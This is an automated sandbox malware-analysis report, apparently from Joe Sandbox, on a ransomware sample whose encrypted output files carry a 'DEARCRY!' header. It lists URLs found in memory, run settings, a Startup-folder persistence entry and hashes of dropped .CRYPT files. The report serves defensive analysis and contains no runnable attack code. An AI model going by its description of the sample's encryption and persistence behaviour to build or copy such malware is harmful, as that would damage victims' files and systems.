              https://outlook.office.com/SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmpfalse
                		high
                https://www.msn.com/spartan/ntpSearchUI.exe, 00000010.00000002.386080523.000001D3CFEA8000.00000004.00000001.sdmpfalse
                  		high
                  https://www.msn.com/spartan/ntpC:SearchUI.exe, 0000001C.00000003.444095457.0000015734983000.00000004.00000001.sdmpfalse
                    		high
                    http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://aefd.nelreports.net/api/report?catHTTP/1.1SearchUI.exe, 0000001C.00000003.440038340.0000015F35845000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://fontfabrik.comexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://outlook.office.com/User.ReadWriteSearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmpfalse
                      		high
                      https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/SearchUI.exe, 00000010.00000002.404559929.000001DBD317C000.00000004.00000001.sdmpfalse
                        		high
                        https://api.msn.com/news/feed?mSearchUI.exe, 00000010.00000002.362630751.000001D3C89B1000.00000004.00000001.sdmpfalse
                          		high
                          https://substrate.office.com/api/v2.0/Users(SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmpfalse
                            		high
                            https://substrate.office.com/profile/v0/users/SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmpfalse
                              		high
                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://api.msn.com/news/feed?market=en-us&query=SearchUI.exe, 00000010.00000002.399294977.000001DBD1939000.00000004.00000001.sdmpfalse
                                		high
                                http://www.fonts.comexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sakkal.comexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://facebook.github.io/react/docs/error-decoder.html?invariantSearchUI.exe, 00000010.00000002.402422907.000001DBD1FA0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000003.315552702.000001DBD10D5000.00000004.00000001.sdmp, SearchUI.exe, 0000001C.00000003.471307339.0000015F3591D000.00000004.00000001.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.comexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                      		high
                                      https://www.openssl.org/docs/faq.html....................cryptobkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmpfalse
                                        		high
                                        https://www.openssl.org/docs/faq.htmlbkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmpfalse
                                          		high
                                          https://onedrive.live.comSearchUI.exe, 00000010.00000002.398688297.000001DBD18B0000.00000004.00000001.sdmpfalse
                                            		high
                                            https://aefd.nelreports.neSearchUI.exe, 00000010.00000003.314054866.000001DBD0CB8000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/news?ocid=SearchUI.exe, 00000010.00000002.398360766.000001DBD1870000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.362630751.000001D3C89B1000.00000004.00000001.sdmpfalse
                                              		high
                                              http://schema.org/reminderSearchUI.exe, 00000010.00000002.360389895.000001D3C8829000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.carterandcone.comlexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                  		high
                                                  https://substrate.office.comSearchUI.exe, 00000010.00000002.399079858.000001DBD1910000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                      		high
                                                      https://aefd.nelreports.net/api/report?cat=bingaotSearchUI.exe, 0000001C.00000003.470980310.0000015F358EE000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.live.com/Web/SearchUI.exe, 00000010.00000002.382569753.000001D3CED5D000.00000004.00000001.sdmp, SearchUI.exe, 0000001C.00000003.444095457.0000015734983000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                          		high
                                                          https://aefd.nelreports.net/api/report?cat=bingrmsSearchUI.exe, 0000001C.00000003.470980310.0000015F358EE000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://pf.directory.live.com/profile/profile.asmxModuleSearchUI.exe, 00000010.00000002.360389895.000001D3C8829000.00000004.00000001.sdmpfalse
                                                            		high

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious

                                                            Private

                                                            IP
                                                            192.168.2.1

                                                            General Information

                                                            Joe Sandbox Version:31.0.0 Emerald
                                                            Analysis ID:367680
                                                            Start date:11.03.2021
                                                            Start time:23:56:11
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 13m 4s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:bkscEXd86b.bin (renamed file extension from bin to exe)
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:37
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:3
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal76.rans.spyw.evad.winEXE@9/201@0/1
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 99.8% (good quality ratio 89.1%)
                                                            • Quality average: 73.9%
                                                            • Quality standard deviation: 33.1%
                                                            HCA Information:
                                                            • Successful, ratio: 52%
                                                            • Number of executed functions: 95
                                                            • Number of non-executed functions: 74
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Override analysis time to 240s for sample files taking high CPU consumption
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, wermgr.exe, backgroundTaskHost.exe, audiodg.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe, mobsync.exe
                                                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 40.88.32.150, 52.147.198.201, 8.248.113.254, 8.248.139.254, 8.248.119.254, 8.248.145.254, 8.248.143.254, 20.190.160.132, 20.190.160.2, 20.190.160.136, 20.190.160.69, 20.190.160.134, 20.190.160.67, 20.190.160.71, 20.190.160.8, 51.104.144.132, 52.255.188.83, 104.43.139.144, 23.218.208.56
                                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, ams2.current.a.prd.aadg.trafficmanager.net
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                            • Report size getting too big, too many NtReadFile calls found.
                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                            • Too many dropped files, some of them have not been restored

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            23:57:23API Interceptor1656x Sleep call for process: explorer.exe modified
                                                            23:57:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.CRYPT
                                                            23:58:14API Interceptor1x Sleep call for process: OpenWith.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASN

                                                            No context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\$Recycle.Bin\S-1-5-18\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):129
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkR:Yr
                                                            MD5:73C804ED1D6216DA1C49EA4CDED846CC
                                                            SHA1:A61AECBE0691F04F4C4DAE8770187C24F1EF0FE9
                                                            SHA-256:E7118C3A89BF814DED2AB232303565239253F59FDEA93E27D0206E175492E3A7
                                                            SHA-512:E84B03D611794516DC8BA99B3E90C08ECF1EB1DEBB3E25BF351FA0911E0C84ADAEC84E270B0123C355CA08098836448B6D6DB28B8E56FFF1FAFF9CC8EDA83580
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\$Recycle.Bin\S-1-5-18\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):424
                                                            Entropy (8bit):7.432048485366865
                                                            Encrypted:false
                                                            SSDEEP:12:rO14Ubt8XLsCeCCUN11McJXQrMiIhXhrvdQ:c4Ut8UMLBieXFq
                                                            MD5:68378A9DB0749885D1D364A350426C9B
                                                            SHA1:775173E7871777CB69BE712B5B56C01E586FE5A7
                                                            SHA-256:305BB7C130FE00E65A17B19B4A93D70E2D0F21A3BE724CFFB24EA0CA198899AC
                                                            SHA-512:9B857AA5C1413A5B99A0EEA91A1D502E8BC914C69059ADC1409D139FCF265B2747EA5E43EE0102FFE68327216CDEB9A1236B90B1AD27D1A5AC81B4B46220BF1C
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview: DEARCRY!.....=R.^..e.=....h.*.A....a......C.......c...kD.......ge.TF..H...e..L.....[,.!L.z.....(..W.].{.......e..e[..l.],.r.....$.....-<.\.y.X..r....Tu..F...!&....9Y1...f..._..Q.....^.M....)...{.".@....V...7..x...5.]2.@D...BC..........l~bU./.{Y.tx.$...............3..[_....V=......\i)..m....W...:......`.q&...!&.....OZ.J...>..+....[..IE..j.K3h......<.`....kB...D....QP..B W.F....I. ...eK.]1...k.$..
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):129
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkR:Yr
                                                            MD5:73C804ED1D6216DA1C49EA4CDED846CC
                                                            SHA1:A61AECBE0691F04F4C4DAE8770187C24F1EF0FE9
                                                            SHA-256:E7118C3A89BF814DED2AB232303565239253F59FDEA93E27D0206E175492E3A7
                                                            SHA-512:E84B03D611794516DC8BA99B3E90C08ECF1EB1DEBB3E25BF351FA0911E0C84ADAEC84E270B0123C355CA08098836448B6D6DB28B8E56FFF1FAFF9CC8EDA83580
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):424
                                                            Entropy (8bit):7.466732762362317
                                                            Encrypted:false
                                                            SSDEEP:12:rO+5EfEuIfQ1bkLrUr5ZLe89by8vzWL0sgLYV/oM44:tE8RfQGsT1omW7Jr
                                                            MD5:DC616808CE4073F79F3A97BDF54F20CB
                                                            SHA1:9D42C250631669E1D32AE1FB4B03461CE2B1183E
                                                            SHA-256:E401F3F953FC3E002B52E2127F86FA86884D65F1AE4D2433393374CEAD6E169A
                                                            SHA-512:3EC1DEDF73FD2A811DBC8F6EE1D6D6BB916049EFB412A3A3DF3E5DCED0F9102FBD5404671DB68930158827841FB7CDD01EB80EF081980E960BA80E07AAF83FF6
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: DEARCRY!.......l8..t.u.1.l.'......K.0..?........G.=^.A..}n.t..a..,#./..../...P0..}.]...).l.T..(kx..).....;....q..i...L..S..Ww.!L.(oIJ....H..S7.&......s...~...l....a.G..RQ...U.Z...)q9..:..D.w-j...d[..9.z].....`.f...tI....z.~.U@..Q...&.......[..E.....{...i............../......:Sp}_.;7...%f.-.f..E....f......K>7..sP....o6^9..HW.y..0k...;J.|..BQ......Z..N......h.%..=..B.zm.#W..Yz.dEb;..t....~..2.WG.+.g..@v
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\$I2EW2MR.pdf
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):94
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkO:Yc
                                                            MD5:233909403BEE2841400C073FA0C2F0D1
                                                            SHA1:6675AB9C5CA21F903E070EA1A217AC655584CF55
                                                            SHA-256:F6AFCAF794FE0E04D6EC18BBDE55412A60C0C5EF55E75223B817E97F208BBCCC
                                                            SHA-512:FE8FF0E739B8CCEF7CFAABE107FB95D0B4E006D256A090BEA5FA27F056D6DD72FB2DAE61F5E927EF08810742E02D3301084194EC12F8A757D83F73E32E53B2A1
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\$I2EW2MR.pdf.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):376
                                                            Entropy (8bit):7.297652068604962
                                                            Encrypted:false
                                                            SSDEEP:6:rOksnvWVIO+7kVD+Rq8FRL/lejiNOizcoG6vw+Xp662QncxmJOyUE5w:rOnvkIOskpuVFhdnNOvoG6vw+ZXLnck8
                                                            MD5:58CA4034DAF263DC1F7D5F3276334DBE
                                                            SHA1:DE260EE11D085C47A96DD28CAFC095240CA98F13
                                                            SHA-256:7B04EA3B1F3105C3D014CED681171E8A3625BD9255D04AB57947F8817C684064
                                                            SHA-512:0253B3F532D2DA3A6F6F128241DA0FF804AE2D2266C2734124CFB7D77A7B50E5558D87D3662C44EFB8FA779F92A1E653AE40E142FB2D6C7B06118966644F7E0D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: DEARCRY!.....}Bd..%>.2.])...\o\..7...VQ.d;....$.>)...(.T.8{_...8._.....zf....~..'p.j.-?.gA.[4B.2b/. Mm*9\76i>tf.o..&..1.yqjy>..Q......J...neq\..b._....4.R.3.......R{U.w.|.i....H.k*....\..rY.=e.rg6.4..._!&..;.M......T.......Y....+g.7.........zi.If..{.........^.......L.#._.yn.JTb......XP....2d....3..\...i.&re.3..T......6+..S...=DB.A....^@@n..S=:.pE.:1..U
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\$R2EW2MR.pdf.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):296
                                                            Entropy (8bit):7.222037750990405
                                                            Encrypted:false
                                                            SSDEEP:6:rOkLo9d7KeZniGzC0zLSTLI5k0edxyhKDMepgUeUjMVeGQT18E8lJU:rOyon7FZC0zGV0SxyyM8HIk18LzU
                                                            MD5:695B49716389817BFE00443CF51FE6D7
                                                            SHA1:952892839B5B421B74DF34FD2FA5062683516A57
                                                            SHA-256:8191B1E8AFDC9A967A35F5D1D42C8D7836CABA1A95B821965004424CDC1EE900
                                                            SHA-512:BB97A818BBCB73AF841A05A57CDF52299E354DA643EB99A43D424F75BEE139B5D56906DCC8C0DE00F31CE7BC6433B853A03321E54C309F6498741A05D9FCBB21
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: DEARCRY!.....]h.S..D.TL.v..U...a.A.<q..M.g8...i..n'..+..#....^.........b...O.#211..m..r.SL9\W...H......Ef.v.@...-.D..H.....U..7.qY..M...cg...QVQ.J.2..)}C.n..p..&...a=.....C.].m;..*..I.1P..?.V.......<.j..\...^.fv..=6X.@.c..I..^?...].$....0.;.&.k%\...0....n..................He4.A.v....
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):129
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkR:Yr
                                                            MD5:73C804ED1D6216DA1C49EA4CDED846CC
                                                            SHA1:A61AECBE0691F04F4C4DAE8770187C24F1EF0FE9
                                                            SHA-256:E7118C3A89BF814DED2AB232303565239253F59FDEA93E27D0206E175492E3A7
                                                            SHA-512:E84B03D611794516DC8BA99B3E90C08ECF1EB1DEBB3E25BF351FA0911E0C84ADAEC84E270B0123C355CA08098836448B6D6DB28B8E56FFF1FAFF9CC8EDA83580
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):424
                                                            Entropy (8bit):7.4314474396392
                                                            Encrypted:false
                                                            SSDEEP:6:rOk2z0y/UlebndoERnPbV69GTOYvOMDMCNMsvvKZLOByRxhxKv6P15gEzOn:rOFJ/UlebnBVjVQGyYvxFbKZLs817O
                                                            MD5:D83BC4AD88DBCD35F0AAD8201813A2DC
                                                            SHA1:71370231BD4578BDA07EDD67AA2F7A4947542C59
                                                            SHA-256:624B12FC9E035D56BC3BE83867E1AA10C8DF29A57E554B6A71C35B81F9248CC5
                                                            SHA-512:0FECA91A269AB414E2982AFDCF1BC8CECEF631E85FDA4795DDE7AF440EC18BAE156B8191D98017A07207FEEB1756AA471960CB0126D4BC5B8740F3F20C569FAC
                                                            Malicious:false
                                                            Preview: DEARCRY!....A....l....5.]Y...C..m#. .J.=....-...G<I.&......o&..2X..O..L....L..x..|-...a........]?.tF~.a.&M.../.W..l .B....R{......f...l..j.8........Kz.........o....>....y5.m.v..*....)..BV&...7..k..y.)..d.... U.8S....e.e..2gx.........~......39...?.......i...............dm3....R4r......W.$O..5.vJ....8..~...cC..'?.M.,."5.6.....BZ.:H....\1?.]....o."./.C.........R.3..~P.5}.*2.._....h....*r.K. ..f..S)..
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:Windows desktop.ini, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):129
                                                            Entropy (8bit):5.323600488446077
                                                            Encrypted:false
                                                            SSDEEP:3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
                                                            MD5:A526B9E7C716B3489D8CC062FBCE4005
                                                            SHA1:2DF502A944FF721241BE20A9E449D2ACD07E0312
                                                            SHA-256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
                                                            SHA-512:D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
                                                            Malicious:false
                                                            Preview: [.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..
                                                            C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):424
                                                            Entropy (8bit):7.454742361675963
                                                            Encrypted:false
                                                            SSDEEP:12:rObeSEld6kUGPqYIc4ZZ/Q6p+EXONzXAnM6FrU1:wLGP2Ff+iONbAM6FA1
                                                            MD5:141A452C55C313F62FA2C7B378C9D968
                                                            SHA1:0DBAE740A932E69787F6B5623B84CD5C263CD798
                                                            SHA-256:0918936D13C2C63CBC7CF061A09B9D28446D2A328B4F12AC35AE3ADBCAE69ABB
                                                            SHA-512:CA74F0A837B06A9AEECB3F6F8ABE6D1FCF5022800C1D0227A6FB401DBAD9DB55CB2EBABF7CC3CBD704F2703541E282179150F4DF4D001431BA948A4EB6FB5AC9
                                                            Malicious:false
